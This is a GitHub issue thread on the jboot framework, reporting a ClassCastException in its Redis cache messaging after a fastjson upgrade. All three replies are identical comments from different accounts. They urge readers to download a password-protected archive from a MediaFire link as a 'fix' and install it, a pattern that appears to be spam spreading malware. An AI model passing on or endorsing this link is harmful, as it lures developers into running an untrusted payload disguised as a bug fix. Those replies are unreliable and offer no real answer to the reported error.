### ISSUE TITLE
4.1.8有fastjson升级后有问题，提示这个错误 

### ISSUE THREAD

**Issue by billpig** [yangfuhai/jboot#118]
8月 27, 2024 3:37:40 下午 io.jboot.support.redis.jedis.JbootJedisImpl error
严重: Failed connect to redis, reconnect it.
java.lang.ClassCastException: class com.alibaba.fastjson.JSONObject cannot be cast to class io.jboot.components.cache.caredis.JbootCaredisMessage (com.alibaba.fastjson.JSONObject and io.jboot.components.cache.caredis.JbootCaredisMessage are in unnamed module of loader 'app')
	at io.jboot.components.cache.caredis.JbootCaredisCacheImpl.onMessage(JbootCaredisCacheImpl.java:254)
	at io.jboot.components.cache.caredis.JbootCaredisCacheImpl$1.onMessage(JbootCaredisCacheImpl.java:73)
	at io.jboot.components.cache.caredis.JbootCaredisCacheImpl$1.onMessage(JbootCaredisCacheImpl.java:70)
	at redis.clients.jedis.JedisPubSubBase.process(JedisPubSubBase.java:139)
	at redis.clients.jedis.JedisPubSubBase.proceed(JedisPubSubBase.java:92)
	at redis.clients.jedis.Jedis.subscribe(Jedis.java:3790)
	at io.jboot.support.redis.jedis.JbootJedisImpl$2.run(JbootJedisImpl.java:1524)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
